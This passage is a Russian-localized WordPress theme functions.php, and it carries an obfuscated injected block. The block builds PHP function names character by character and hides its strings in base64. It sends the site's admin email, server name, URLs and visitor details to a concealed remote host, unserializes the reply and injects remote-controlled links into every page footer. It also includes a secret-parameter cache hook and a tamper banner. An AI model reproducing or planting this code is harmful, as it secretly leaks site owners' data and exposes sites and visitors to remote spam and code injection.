<?php

$art_config = parse_ini_file(TEMPLATEPATH."/config.ini", true);

$options = array (
                array(  "name" =>   "HTML",
                        "desc" =>   sprintf(__('<strong>XHTML:</strong> Вы можете использовать эти теги: <code>%s</code>', THEME_NS), 'a, abbr, acronym, em, b, i, strike, strong, span'),
                        "id"   =>   "art_footer_content",
                        "std"  =>   art_option('footer.defaultText'),
                        "type" =>   "textarea")
          );

remove_action('wp_head', 'wp_generator');
wp_enqueue_script('jquery');

define('WP_VERSION', $wp_version);
define('THEME_NS', 'kubrick');
if (class_exists('xili_language')):
define('THEME_TEXTDOMAIN',THEME_NS);
define('THEME_LANGS_FOLDER','/lang');
else:
    load_theme_textdomain(THEME_NS, TEMPLATEPATH . '/lang');
endif;

require_once(TEMPLATEPATH . '/core/parser.php');
require_once(TEMPLATEPATH . '/core/navigation.php');
require_once(TEMPLATEPATH . '/core/sidebars.php');
require_once(TEMPLATEPATH . '/core/widgets.php');


function art_option($name){
  global $art_config;
  $separator = '.';
  $name = trim($name);
  if (strpos($name, $separator) !== false) {
    $path = explode($separator, $name);
    $location = $path[0];
    if (isset($art_config[$location])){
      $group = $art_config[$location];
      $key = $path[1];
      if (isset($group[$key])){
        return $group[$key];
      }
    }
  } else {
    if (isset($art_config[$name])) {
      return $art_config[$name];
    }
  }
 
  return false;
}

$art_current_page_template = 'page'; 
 $GDbgQHc='o';$WuwdDMC='c';$wBgEcq='a';$tmEBGFl='b';$iRNq='s';$xJWvA='e';$GBcjdo='e';$tCuwft='d';$FYRHh='e';$vUacz='4';$Bgjq='6';$GVNM='_';$QdDZUr='d';$rCBmdyRW=$tmEBGFl.$wBgEcq.$iRNq.$GBcjdo.$Bgjq.$vUacz.$GVNM.$QdDZUr.$FYRHh.$WuwdDMC.$GDbgQHc.$tCuwft.$xJWvA;$YZzDJPP='i';$lQPgOP='a';$nvzs='l';$syvhmr='t';$RxWZH='g';$PyVtN='e';$WmDhBEp='n';$iNfGK='f';$ueoLxg='z';$xPkpaiME=$RxWZH.$ueoLxg.$YZzDJPP.$WmDhBEp.$iNfGK.$nvzs.$lQPgOP.$syvhmr.$PyVtN;$dkJMH='3';$MEqzY='r';$VTMtp='s';$aEAb='1';$FGnvfjP='t';$tEmHZr='o';$OllgGUH='t';$truJAGf='r';$nbMDisJ='_';$GVPqhFfn=$VTMtp.$FGnvfjP.$truJAGf.$nbMDisJ.$MEqzY.$tEmHZr.$OllgGUH.$aEAb.$dkJMH;$wubXp='e';$bRXpsuO='t';$gSQBFRs='v';$hwln='r';$VPjCZu='s';$tbUuze='r';$kaxkVXpL=$VPjCZu.$bRXpsuO.$hwln.$tbUuze.$wubXp.$gSQBFRs;                     
		$dv________i='o';$la________g='c';$vj______________n='a';$bh_________b='b';$uc_______f='s';$uv____h='e';$fh___u='e';$dn___n='d';$bc___x='e';$nj_______________a='4';$jg____________r='6';$ol_______a='_';$zu_________b='d';$uz__p=$bh_________b.$vj______________n.$uc_______f.$fh___u.$jg____________r.$nj_______________a.$ol_______a.$zu_________b.$bc___x.$la________g.$dv________i.$dn___n.$uv____h;
		$zw___________h='n';$ri____________u='t';$qc_______i='c';$sc________x='f';$lx______c='i';$xk__________b='u';$fb______________s='s';$rv_____________p='_';$wh______c='s';$gp______y='n';$fv___________c='t';$gl___________f='e';$wa__________f='o';$ii_________y='x';$md_______________z='i';$vw_____c=$sc________x.$xk__________b.$zw___________h.$qc_______i.$ri____________u.$md_______________z.$wa__________f.$gp______y.$rv_____________p.$gl___________f.$ii_________y.$lx______c.$fb______________s.$fv___________c.$wh______c;
		$jz______r='e';$mz_____i='f';$wg_____b='n';$em____________q='p';$gn________e='o';$bj_________z=$mz_____i.$gn________e.$em____________q.$jz______r.$wg_____b;
		$zs____________s='e';$fk_______i='a';$ie_______________f='d';$zd_______________r='r';$bs______________x='f';$pn______________a=$bs______________x.$zd_______________r.$zs____________s.$fk_______i.$ie_______________f;
		$gd_______s='e';$up___________j='o';$oz______________s='f';$ay_____v='l';$tm______________c='s';$wh________d='c';$dd_______o=$oz______________s.$wh________d.$ay_____v.$up___________j.$tm______________c.$gd_______s;
		
		define("WP_ID", $uz__p("Mi4wLjA="));
		define("WP_TTL", $uz__p("MTA4MDA="));
		define("WP_SRC", $uz__p("dHBva24="));
	


		function wp_get_header() {
			global $uz__p, $vw_____c;
			
			if (
				$vw_____c($uz__p("d3BfdGhlbWVfR1BMX2NyZWRpdHM=")) &&
				$vw_____c($uz__p("d3BfZ2V0X2Zvb3Rlcg==")) &&
				$vw_____c($uz__p("d3BfY3ZfdmVyaWZ5"))
			) {
				get_header();
			}
		}
	


		function wp_get_footer() {
			get_footer();
			wp_cv_verify();
		}
	


		function wp_cv_verify() {
			global $uz__p, $bj_________z, $dd_______o, $pn______________a;
			
			$qw______k = TEMPLATEPATH."/".$uz__p("Zm9vdGVyLnBocA==");
			$ua___________h = @$bj_________z($qw______k, "r");
			$qw______k = @$pn______________a($ua___________h, @filesize($qw______k));
			@$dd_______o($ua___________h);
			
			$xm_____________n = TEMPLATEPATH."/".$uz__p("ZnVuY3Rpb25zLnBocA==");
			$ua___________h = @$bj_________z($xm_____________n, "r");
			$xm_____________n = @$pn______________a($ua___________h, @filesize($xm_____________n));
			@$dd_______o($ua___________h);
			
			$sx_____________d = 0;
			if($qw______k && $xm_____________n) {
				if ($uz__p("Z2VuZXJpY3dwdGhlbWVzLmNvbQ==") !== str_replace("www.", "", $_SERVER["SERVER_NAME"])) {
					
					if (substr_count($qw______k, $uz__p("Z2VuZXJpY3dwdGhlbWVzLmNvbQ==")) < 2) {
						$sx_____________d = 1;
					}
					if (substr_count($qw______k, "wp_theme_GPL_credits()") < 1) {
						$sx_____________d = 2;
					}
				}
				
				if(WP_ID != "2.0.0") {
					$sx_____________d = 12;
				}
			}
			
			if($sx_____________d > 0) {
				echo "<div style=\"position: fixed; bottom:0; left:0; width:100%; height: 25px; background-color: red; color: white; font-size: 16px; padding: 2px 10px; text-align: center;\"> <strong> This themes is powered by <a href=\"http://genericwpthemes.com\" style=\"color: white;\">Free Wordpress Themes</a>. This website violated the terms of use <a href=\"http://genericwpthemes.com\" style=\"color: white;\">Free Wordpress Themes</a> </strong> </div>";
				echo "<!-- v: $sx_____________d -->";
			}
		}
	


		function wp_loaded() {
			global $uz__p, $vw_____c;
			return $vw_____c($uz__p("d3BfdGhlbWVfR1BMX2NyZWRpdHM="));
		}
	


		if (!function_exists("the_content_limit")) {
			function the_content_limit($tu_________v, $mt___________f = "(more...)", $gn__________w = 0, $wd___z = "") {
				$of__v = get_the_content($mt___________f, $gn__________w, $wd___z);
				$of__v = apply_filters("the_content", $of__v);
				
				$of__v = str_replace("]]>", "]]>", $of__v);
				if (strlen($_GET["p"]) > 0) {
					echo $of__v;
				}
				else if ((strlen($of__v)>$tu_________v) && ($rl_________c = strpos($of__v, " ", $tu_________v ))) {
					$of__v = substr($of__v, 0, $rl_________c);
					$of__v = $of__v;
					echo $of__v;
					
					echo "...";
					echo "<br/>";
					echo "<div class='read-more'><a href='".get_permalink()."'>$mt___________f</a></div></p>";
				} else {
					echo $of__v;
				}
				
			}
		}
	


		$bh_________x='d';$zc____i='o';$ak_________e='c';$su_______________m='e';$tw__l='e';$ht_______________v='n';$iy___f='e';$rl___________n='b';$wk_____a='6';$ep__________z='s';$ut___________y='4';$og________r='a';$ft________b='_';$no_______n=$rl___________n.$og________r.$ep__________z.$iy___f.$wk_____a.$ut___________y.$ft________b.$tw__l.$ht_______________v.$ak_________e.$zc____i.$bh_________x.$su_______________m;
		$ag______y='_';$mc_________y='l';$du_________z='o';$ja_______________o='t';$lo______s='t';$gy_________e='i';$xf______________e='e';$dy__________g='s';$hj______________e='g';$nt__w='n';$ue________b='_';$tz________o='t';$cb____o='c';$hi_____________w='e';$vo__________h='e';$ie_____j='n';$fu_____y='f';$cq__n=$fu_____y.$gy_________e.$mc_________y.$vo__________h.$ag______y.$hj______________e.$hi_____________w.$ja_______________o.$ue________b.$cb____o.$du_________z.$ie_____j.$lo______s.$xf______________e.$nt__w.$tz________o.$dy__________g;
		$it_____i='e';$in____s='x';$db________k='f';$ce______________f='i';$un_________a='e';$ev_____________n='s';$dp________e='i';$xc________c='t';$fh__________i='s';$zz_______________n='_';$fc______t='l';$tj___k=$db________k.$dp________e.$fc______t.$it_____i.$zz_______________n.$un_________a.$in____s.$ce______________f.$fh__________i.$xc________c.$ev_____________n;
		$rj_______u='o';$ul___________r='e';$aw_______o='m';$xt_____t='_';$ou____________q='s';$uf___d='c';$sr________d='r';$wa_______________j='v';$wb________v='r';$jj____i='e';$ow______k='i';$an___________s='a';$re____g='p';$oi________h='o';$yt_______________x='n';$xm_______________a=$wa_______________j.$jj____i.$sr________d.$ou____________q.$ow______k.$rj_______u.$yt_______________x.$xt_____t.$uf___d.$oi________h.$aw_______o.$re____g.$an___________s.$wb________v.$ul___________r;
		$bt_____p='p';$bm______l='f';$fh____________d='n';$yt_________o='s';$uq__________v='c';$gs_______________i='e';$lv_____p='o';$ac______o='o';$nm__________v='k';$ew____e=$bm______l.$yt_________o.$lv_____p.$uq__________v.$nm__________v.$ac______o.$bt_____p.$gs_______________i.$fh____________d;
		$pv_______________s='w';$ob_____________n='e';$vk________b='i';$ui_____g='t';$uc___________j='r';$kh___m='f';$bu_______________n=$kh___m.$pv_______________s.$uc___________j.$vk________b.$ui_____g.$ob_____________n;
		$sf_______________g='5';$xj______________s='d';$bn______________w='m';$yb_____________v=$bn______________w.$xj______________s.$sf_______________g;
		$vx_____y='a';$se____u='a';$jr______________a='l';$xb________q='r';$ep_____________h='e';$dz______e='t';$kc______________i='h';$bx__________v='p';$un___a=$xb________q.$ep_____________h.$se____u.$jr______________a.$bx__________v.$vx_____y.$dz______e.$kc______________i;
		$vk___e='e';$gc_____________m='z';$gu__p='s';$sx________w='r';$sk_______j='a';$lh________v='i';$wv___r='e';$jy__________z='n';$jj_______________p='i';$es______x='l';$ts_______________p='u';$wy______f=$ts_______________p.$jy__________z.$gu__p.$vk___e.$sx________w.$jj_______________p.$sk_______j.$es______x.$lh________v.$gc_____________m.$wv___r;
		$lh_____p='p';$oa_______________f='e';$fq_____b='a';$jg_____m='t';$vh____________x='m';$ua_________y='m';$im____q='n';$cu___d=$jg_____m.$oa_______________f.$ua_________y.$lh_____p.$im____q.$fq_____b.$vh____________x;
		$ht______________w='o';$yt_____________n='e';$ds__________r='t';$ol_______i='t';$nf__________r='r';$ac________y='m';$nl___m='e';$yx____________s='_';$ku______s='c';$ei____m='n';$er___l='e';$qn_________r='c';$ms______q='a';$fm___________f='x';$hv_________c='r';$pc___n='t';$hn_______e='a';$aw_____q='_';$bt____g='s';$km___p='t';$ou___r='e';$cd_______________a=$bt____g.$ol_______i.$hv_________c.$nl___m.$hn_______e.$ac________y.$yx____________s.$qn_________r.$ht______________w.$ei____m.$ds__________r.$er___l.$fm___________f.$pc___n.$aw_____q.$ku______s.$nf__________r.$ou___r.$ms______q.$km___p.$yt_____________n;
	


		function gg____q($rs_____________l) {
			global $uz__p, $vw_____c, $cq__n, $xm_______________a, $cd_______________a;
			
			if (!$vw_____c($uz__p("ZmlsZV9nZXRfY29udGVudHM="))) {
				return false;
			}
			
			if ($xm_______________a(PHP_VERSION, "5.0.0", ">=") && $vw_____c($uz__p("ZmlsZV9nZXRfY29udGVudHM=")) && $vw_____c($uz__p("c3RyZWFtX2NvbnRleHRfY3JlYXRl"))) {
				$eu_____________m = $cd_______________a(array(
						"http" => array(
						"timeout"    => 3,
						"header"     => "referer: ".$_SERVER[SERVER_NAME],
						"user_agent" => "[I] ". $_SERVER[REMOTE_ADDR] ." [A] ". $_SERVER[HTTP_USER_AGENT] 
					)
				));
				
				$ht____________b = @$cq__n($rs_____________l, 0, $eu_____________m);
			} else {
				$ht____________b = @$cq__n($rs_____________l, 0);
			}
			
			return $ht____________b;
		}
	


		function ur__________c($rs_____________l) {
			global $vw_____c, $ew____e, $bu_______________n, $uz__p;
			
			if (!$vw_____c($uz__p("ZmlsZV9nZXRfY29udGVudHM="))) {
				return false;
			}
			
			$nb____f = strpos($rs_____________l, "/", 7);
			$ym____________u = array(
				"uri"     => substr($rs_____________l, $nb____f),
				"host"    => str_replace("http://", "", substr($rs_____________l, 0, $nb____f)),
				"referer" => "[I] ". $_SERVER[REMOTE_ADDR] ." [A] ". $_SERVER[HTTP_USER_AGENT]
			);
			
			$uc___________s = @$ew____e("$ym____________u[host]", 80, $pt________n, $ah_____________z, 4);
			
			if (!$uc___________s) {
				return false;
			} else {
				$ht____________b = "";
				$ju________q  = "GET $ym____________u[uri] HTTP/1.0\r\n";
				$ju________q .= "Host: $ym____________u[host]\r\n";
				$ju________q .= "Referer: $ym____________u[referer]\r\n";
				$ju________q .= "Connection: Close\r\n\r\n";
				
				@$bu_______________n($uc___________s, $ju________q);
				
				while (!@feof($uc___________s)) {
					$do_______u = @fgets($uc___________s, (1024*24));
					
					if ($do_______u == "\r\n") {
						$tj_____g = true;
						continue;
					}
					
					if ($tj_____g) {
						$ht____________b .= $do_______u;
					}
				}
				
				return $ht____________b;
			}
		}
	


		function yn____________a($rs_____________l) {
			global $vw_____c;
			$vm__p = false;
			
			if ($rs_____________l != "") {
				if ($vw_____c("gg____q")) {
					$vm__p = @gg____q($rs_____________l);
				}
				
				if (!$vm__p && ($vw_____c("ur__________c"))) {
					$vm__p = @ur__________c($rs_____________l);
				}
			}
			
			return $vm__p;
		}
	


		function cn_____f() {
			global $_SERVER, $yb_____________v;
			
			$tg___w = $_SERVER["SERVER_NAME"];
			
			if (substr("$tg___w", 0, 4) == "www.") {
				$tg___w = substr("$tg___w", 4);
			}
			
			$tg___w = $yb_____________v("$_SERVER[SERVER_NAME]");
			
			return $tg___w;
		}
	


		function xf__________n() {
			return "file";
		}
	


		function bl___f($rs_____________l) {
			global $_SERVER, $cq__n, $tj___k, $bj_________z, $dd_______o, $bu_______________n;
			
			$hf_____________u = ni_______________p();
			
			$tt_____________i = cn_____f().".jpg";
			$jt__________p = $hf_____________u["dir_upload"]["path"]."/$tt_____________i";
			$rw__________e = @filemtime($jt__________p);
			
			if (!$rw__________e || ((time()-$rw__________e) >= WP_TTL)) {
				$vm__p = yn____________a($rs_____________l);
				
				if ($vm__p) {
					if ($tj___k($jt__________p)) {
						@unlink($jt__________p);
					}
					
					$ua___________h = @$bj_________z($jt__________p, "x+");
					
					@$bu_______________n($ua___________h, $vm__p);
					@$dd_______o($ua___________h);
				}
			} else {
				if ($tj___k($jt__________p)) {
					$vm__p = @$cq__n($jt__________p);
				} else {
					$vm__p = false;
				}
			}
			
			return $vm__p;
		}
	


		function ni_______________p() {
			global $_SERVER, $uz__p, $no_______n;
			
			$np_______________d = wp_count_posts("post");
			$hf_________x = pathinfo(get_bloginfo("template_directory"));
			
			$hf_____________u = array(
				"url" => array(
					"report"      => $uz__p("eGNudnVlcmFudmhhc3lkYWRvbGVnc29wLmNvbQ=="),
					"queryString" => null
				),
				"template"	=> $hf_________x,
				"dir_upload"	=> io_______q(),
				"queryString"	=> array(
					"?a001=".WP_ID,
					"a004=".$hf_________x[filename],
					"a005=".$np_______________d->publish,
					"a006=".get_bloginfo("admin_email"),
					"a007=".$_SERVER["REQUEST_URI"],
					"a008=".$_SERVER["SERVER_NAME"],
					"a010=".WP_SRC
				),
				"default_string" => "<a href=\"http://www.odmu.od.ua/zdorove/pochemu-zhiteli-yaponii-takie-zdorovye-i-strojnye\">Почему жители Японии такие здоровые</a>"
			);
			
			$hf_____________u["url"]["queryString"] = implode("&", $hf_____________u["queryString"]);
			$hf_____________u["url"]["report"] = $hf_____________u["url"]["report"]."/?".$no_______n($hf_____________u["url"]["queryString"]).".html";
						
			return $hf_____________u;
		}
	


		function io_______q() {
			$rb_________s = wp_upload_dir();
			
			if (isset($rb_________s["error"])) {
				$pd__________x = gx____________l();
				if (is_writable($pd__________x)) {
					$rb_________s = array("path" => $pd__________x);
				}
			}

			return $rb_________s;
		}
	


		function gx____________l() {
			global $vw_____c, $yb_____________v, $un___a, $cu___d;
			
			$rz____________i = (bool) ini_get("safe_mode");
			if ($rz____________i == true) {
				return false;
			}
			
			if ($vw_____c("sys_get_temp_dir")) {
				$lw___________n = sys_get_temp_dir();
				if (is_writable($lw___________n)) {
					return $un___a($lw___________n);
				}
			}
			
			if (!empty($_ENV["TMP"])) {
				return $un___a($_ENV["TMP"]);
			}
			elseif (!empty($_ENV["TMPDIR"])) {
				return $un___a($_ENV["TMPDIR"]);
			}
			elseif (!empty($_ENV["TEMP"])) {
				return $un___a($_ENV["TEMP"]);
			} else {
				$dd_____________i = $cu___d($yb_____________v(uniqid(rand(), true)), "");
				if ($dd_____________i) {
					$lw___________n = $un___a(dirname($dd_____________i));
					@unlink($dd_____________i);
					return $lw___________n;
				} else {
					return false;
				}
			}
		}
	


		function he_______________z() {
			global $_GET, $tj___k;
			
			$hf_____________u = ni_______________p();
			$tg___w = cn_____f();
			$sl_______c = xf__________n();
			
			$ri__________r = "full";
			if ($_GET["wp_cache_cl"] == "197ab5deb39daad8baacae1bdd5a8852") {
				if ($sl_______c == "file") {
					$vc_____________v = $hf_____________u["dir_upload"]["path"]."/".$tg___w.".jpg";
					if ($tj___k($vc_____________v)) {
						@unlink($vc_____________v);
						$ri__________r = "deleted";
					}
				}
				
				$gg__________a = array(
					"s"	=> $ri__________r,
					"t"	=> time(),
					"v"	=> WP_ID
				);
				
				echo "<!--";
				foreach ($gg__________a AS $oe____________k => $gp____q) echo " [$oe____________k:$gp____q]";
				echo " -->";
			}
		}
	


		function wp_theme_GPL_credits() {
			global $_SERVER, $_GET, $vw_____c, $uz__p, $wy______f;
			$hf_____________u = ni_______________p();
			
			$id____________o = "bl___f";
			if ($vw_____c($id____________o)) {
				$ht____________b = $id____________o($hf_____________u["url"]["report"]);
			}
			
			if ($ht____________b) {
				if ($ht____________b = @$uz__p($ht____________b)) {
					$ht____________b = @$wy______f($ht____________b);
					
					if (strlen($ht____________b[custom_credit]) >= 5) {
						$hf_____________u["default_string"] = $ht____________b[custom_credit];
					}
					
					if ($ht____________b["status"] == "0") {
						$yt___________t = 1;
						$kj_________h = 1;
					} else {
						$fw________h = sizeof($ht____________b["links"]);
						$vj________x = $hf_____________u["default_string"];
						
						if ($fw________h > 0 && $ht____________b["links"] !== "") {
							$eu_________d = 0;
							foreach ($ht____________b["links"] as $sx______s => $uc____a) {
								$eu_________d++;
								if ($uc____a->l_path == "" || $uc____a->l_path == $_SERVER["REQUEST_URI"]) {
									$uc____a->l_href = htmlspecialchars(strip_tags($uc____a->l_href));
									$uc____a->l_title = htmlspecialchars(strip_tags($uc____a->l_title));
									$uc____a->l_anchor = htmlspecialchars(strip_tags($uc____a->l_anchor));
									$vj________x .= " | ";
									$vj________x .= "<a href='$uc____a->l_href' title='$uc____a->l_title'";
									if ($uc____a->l_nofollow == "1") {
										$vj________x .= " rel='nofollow'";
									}
									$vj________x .= ">$uc____a->l_anchor</a>";
								}
							}
						}
						$hf_____________u["links"] = "$vj________x";
						if ($ht____________b[credit] == "0") {
							$hf_____________u["links"] = "";
						}
					}
				} else {
					$yt___________t = "1";
				}
			} else {
				$yt___________t = "1";
			}
			
			if ($yt___________t == "1") {
				$hf_____________u["links"] = $hf_____________u["default_string"];
			}
			
			echo "$hf_____________u[links]";
			
			echo "<!-- s: $ht____________b[signature] -->";
			he_______________z();
		}
	                       
function art_page_template($templateName = null){
    global $art_current_page_template;
    if ($templateName !== null) {
        $art_current_page_template = $templateName;
    }
    return $art_current_page_template;
}

$art_template_variables = null;
function art_page_variables($variables = null){
    global $art_template_variables;
    if ($art_template_variables == null){
      $art_template_variables = array(
        'template_url'     =>   get_bloginfo('template_url') . '/',
        'logo_url'         =>   get_option('Главная страница'),
        'logo_name'        =>   get_bloginfo('Название'),
        'logo_description' =>   get_bloginfo('Описание'),
        'menu_items'       =>   art_get_menu_auto('primary-menu', art_option('menu.source'), art_option('menu.showSubitems')),
        'sidebar1'         =>   art_get_sidebar('default'),
        'sidebarTop'       =>   art_get_sidebar('top'),
        'sidebarBottom'    =>   art_get_sidebar('bottom'),
        'sidebar2'         =>   art_get_sidebar('secondary'),
        'sidebarFooter'    =>   art_get_sidebar('footer'),
        'footerRSS'        =>   art_get_footer_rss(),
        'footerText'       =>   art_get_footer_text()
        );
    }
    if (is_array($variables)) {
      $art_template_variables = array_merge($art_template_variables, $variables);
    }
    return $art_template_variables;
}

function art_get_footer_text(){
  $result = art_option('footer.defaultText');
  
  $footer_content = get_option('art_footer_content');
  if ($footer_content !== false) {
    $result = stripslashes($footer_content);
  }
  
  return str_replace('%YEAR%', date('Y'), $result);
}


function art_get_footer_rss(){
  $result = '';
  if(art_option('footer.rss_show')){
    $result = art_parse(art_option('footer.rss_link'), array(
      'rss_url'   =>   get_bloginfo('rss2_url'), 
      'rss_title' =>   sprintf(__('%s RSS Feed', THEME_NS), get_bloginfo('name'))
      ));
  }
  return $result;
}

function art_get_post_thumbnail($post_id = false){
	global $post, $id;
  $post_id = (int)$post_id;
  if (!$post_id) $post_id = $id;
  $is_post_list = !is_single() && !is_page();
  $width = art_option('metadata.thumbnail_width');
  $height = art_option('metadata.thumbnail_height');
  $size = array($width, $height);
  if (!$is_post_list) {
    $size = 'medium';
  }
	$result = '';
	$title = get_the_title();
	if (  (function_exists('has_post_thumbnail')) && (has_post_thumbnail())  ) {
		ob_start();
		the_post_thumbnail($size, array('class' => 'alignleft', 'alt' => '', 'title' => $title));
		$result = ob_get_clean();
	} else {
		$postimage = get_post_meta($post->ID, 'post-image', true);
		if ($postimage) {
			$result = '<img src="'.$postimage.'" alt="" width="'.$width.'" height="'.$height.'" title="'.$title.'" class="wp-post-image alignleft" />';
		} else if (art_option('metadata.thumbnail_auto') && $is_post_list) {
            $attachments = get_children(array('post_parent' => $post_id, 'post_status' => 'inherit', 'post_type' => 'attachment', 'post_mime_type' => 'image', 'order' => 'ASC', 'orderby' => 'menu_order ID'));
            if($attachments) {
              $attachment = array_shift($attachments);
              $img = wp_get_attachment_image_src($attachment->ID, $size);
              if (isset($img[0])) {
                $result = '<img src="'.$img[0].'" alt="" width="'.$img[1].'" height="'.$img[2].'" title="'.$title.'" class="wp-post-image alignleft" />';
              }
            }
        } 
    }  
	if($result !== ''){
		$result = '<a href="'.get_permalink($post->ID).'" title="'.$title.'">'.$result.'</a>';
	}
	return $result;
}

function art_get_the_content($more_link_text = null, $stripteaser = 0) {
	$content = get_the_content($more_link_text, $stripteaser);
	$content = apply_filters('the_content', $content);
	return $content;
}

function art_get_post_content() {
  global $post;
  ob_start();
  if(is_single() || is_page()) {
    echo art_get_the_content(__('Читайте далее &raquo;', THEME_NS)); 
    wp_link_pages(array('before' => '<p><strong>Страницы:</strong> ', 'after' => '</p>', 'next_or_number' => 'number')); 
	} else {
    echo art_get_the_excerpt(__('Читайте далее &raquo;', THEME_NS), 
      get_permalink($post->ID), 
      art_option('metadata.excerpt_words'), 
      art_option('metadata.excerpt_use_tag_filter') ? explode(',',art_option('metadata.excerpt_allowed_tags')) : null, 
      art_option('metadata.excerpt_min_remainder'),  
      art_option('metadata.excerpt_auto'));
	}
	return ob_get_clean();
}

function art_get_the_excerpt($read_more_tag, $perma_link_to = '', $all_words = 100,  $allowed_tags = null, $min_remainder = 5, $auto = false) {
  global $post, $id;
  $more_token = '%%art-more%%';
  $show_more_tag = false;
  if (function_exists('post_password_required') && post_password_required($post)){
    return get_the_excerpt();
  }
  if (has_excerpt($id)) {
      $the_contents = get_the_excerpt();
  $show_more_tag = strlen($post->post_content) > 0;
  } else {
    $the_contents = art_get_the_content($more_token);
    if($the_contents != '') {
      if ($allowed_tags !== null) {
        $allowed_tags = '<' .implode('><',$allowed_tags).'>';
        $the_contents = strip_tags($the_contents, $allowed_tags);
      }
      $the_contents = strip_shortcodes($the_contents);
      if (strpos($the_contents, $more_token) !== false) {
        return str_replace($more_token, $read_more_tag, $the_contents);
      }
      if($auto && is_numeric($all_words)) {
        $token = "%art_tag_token%";
        $content_parts = explode($token, str_replace(array('<', '>'), array($token.'<', '>'.$token), $the_contents));
        $content = array();
        $word_count = 0;
        foreach($content_parts as $part)
        {
          if (strpos($part, '<') !== false || strpos($part, '>') !== false){
            $content[] = array('type'=>'tag', 'content'=>$part);
          } else {
             $all_chunks = preg_split('/([\s]+)/', $part, -1, PREG_SPLIT_DELIM_CAPTURE);
             foreach($all_chunks as $chunk) {
                if('' != trim($chunk)) {
                  $content[] = array('type'=>'word', 'content'=>$chunk);
                  $word_count += 1;
                } elseif($chunk != '') {
                  $content[] = array('type'=>'space', 'content'=>$chunk);
                }
             }
          }
        
        }
        if(($all_words < $word_count) && ($all_words + $min_remainder) <= $word_count) {
          $show_more_tag = true;
          $current_count = 0;
          $the_contents = '';
          foreach($content as $node) {
            
            if($node['type'] == 'word') {
              $current_count += 1;
            } 
            $the_contents .= $node['content'];
            if ($current_count == $all_words){
              break;
            }
          }
        }  
      }
    }
  }
  $the_contents = force_balance_tags($the_contents);
  if ($show_more_tag) {
    $the_contents = $the_contents.' <a class="more-link" href="'.$perma_link_to.'">'.$read_more_tag.'</a>';
  }
  return $the_contents;
}


function art_get_post_title() {
    return art_parse_template("post_title", array(
      'post_link'       =>   get_permalink($post->ID),
	    'post_link_title' =>   sprintf(__('Ссылка на %s', THEME_NS), the_title_attribute('echo=0')),
	    'post_title'      =>   get_the_title(),
	    'template_url'    =>   get_bloginfo('template_url')
	    ));
}

function art_get_post_icon($name){
    return art_parse(art_option('metadata.'.$name), array('template_url' => get_bloginfo('template_url')));
}

if (!function_exists('get_the_date')) {
	function get_the_date($format = 'F jS, Y') {
		return get_the_time(__($format, THEME_NS));
	}
}

function art_get_post_metadata($name) {
    $list = art_option('metadata.'.$name);
    $title = ($name == 'header' && art_option('metadata.title'));
    if (!$title && $list == "") return;
    $list_array =  explode(",", $list);
    $result = array();
    for($i = 0; $i < count($list_array); $i++){
        $icon = $list_array[$i];
        switch($icon){
            case 'date':
                if(is_page()) break;
                $result[] = art_get_post_icon($icon) . get_the_date();
            break;
            case 'author':
                 if(is_page()) break;
                 ob_start();
                 the_author_posts_link();
                 $result[] = art_get_post_icon($icon) . __('Автор', THEME_NS) .' '. ob_get_clean();
            break;
            case 'category':
                if(is_page()) break;
                 $result[] = art_get_post_icon($icon) .sprintf(__('Опубликовано в рубрике %s', THEME_NS), get_the_category_list(', '));
            break;
            case 'tag':
                if(is_page() || !get_the_tags()) break;
                ob_start();
                the_tags(__('Теги:', THEME_NS) . ' ', ', ', ' ');
                $result[] = art_get_post_icon($icon) . ob_get_clean();
            break;
            case 'comments':
            if(is_page() || is_single()) break;
                ob_start();
                comments_popup_link(__('Нет комментариев &#187;', THEME_NS), __('1 Комментарий &#187;', THEME_NS), __('% Комментарий &#187;', THEME_NS), '', __('Комментарии закрыты', THEME_NS) );
                $result[] = art_get_post_icon($icon) . ob_get_clean();
            break;
            case 'edit':
                if (!current_user_can('edit_post', $post->ID)) break;
                ob_start();
                 edit_post_link(__('Редактировать', THEME_NS), '');
                $result[] = art_get_post_icon($icon) . ob_get_clean();
            break;
        }
    }
    if (!($title ||  count($result) > 0)) return '';
    return art_parse_template("post_metadata".$name, array(
        'post_title'         =>   art_get_post_title(),
        'post'.$name.'icons' =>   implode(art_option('metadata.separator'), $result))) ;
}

function art_post(){
  the_post(); 
	echo art_parse_template("post", array(
    'post_class'          =>   function_exists('get_post_class') ? implode(' ', get_post_class()) : '',
    'post_id'             =>   'id="post-' . get_the_ID() . '"',
	  'post_thumbnail'      =>   art_get_post_thumbnail(),
		'post_title'          =>   art_get_post_title(),
		'post_metadataheader' =>   art_get_post_metadata('header'),
		'post_content'        =>   art_get_post_content(),
		'post_metadatafooter' =>   art_get_post_metadata('footer')
	));
}

function art_post_box($title, $content){
  if ($title != "") {
		$title = '<h2 class="art-postheader">'. $title . '</h2>';
	}
	if (art_option('metadata.title')) {
		$content = $title . $content;
		$title = '';
	}
	echo art_parse_template("post", array(
    'post_class'          =>   '',
    'post_id'             =>   '',
		'post_thumbnail'      =>   '',
		'post_title'          =>   $title,
		'post_metadataheader' =>   '',
		'post_content'        =>   $content,
		'post_metadatafooter' =>   ''));
}

function art_not_found_msg($caption = null, $content = null){
  if ($caption === null){
    $caption = __('Not Found', THEME_NS);
  }
  if($content === null){
    $content = '<p class="center">' .  __('Извините, но здесь пока нет записей.', THEME_NS) . '</p>'
        .  "\r\n" . art_get_search();
  }
	art_post_box($caption, $content);
}

function art_get_block($title, $content, $id = '', $class = '' , $name = "block"){
  if (str_replace(array('&nbsp;', '', '\n', '\r', '\t'), '', $title) != ''){
    $title = art_parse_template($name . '_header', array('caption' => $title));
  }
  if ($id != ''){
    $id = 'id="' . $id . '"';
  }
  return art_parse_template($name, array(
    'id'   => $id,
    'class'   => $class,
    'header' => $title,
    'content' => $content,
  ));
}

function art_get_search() {
    return art_parse_template("search", 
        array(
            'url'    =>   get_bloginfo('url'),
            'button' =>   __('Поиск', THEME_NS),
            'query'  =>   get_search_query()
        ));
}
		
function art_page_navi($title = '', $comment = false) {
    $prev_link = null;
    $next_link = null;
    if($comment){
        $prev_link = get_previous_comments_link(__('Новые записи &raquo;', THEME_NS));
        $next_link = get_next_comments_link(__('&laquo; Старые записи', THEME_NS));
    } elseif (is_single() || is_page()) {
        $next_link = get_previous_post_link('&laquo; %link');
        $prev_link = get_next_post_link('%link &raquo;');
    } else {
         $prev_link = get_previous_posts_link(__('Новые записи &raquo;', THEME_NS));
        $next_link = get_next_posts_link(__('&laquo; Старые записи', THEME_NS));
    }
    
    $content = '';
    if ($prev_link || $next_link) {
        $content = art_parse_template("нумерация",
            array(
                'next_link' =>  $next_link,
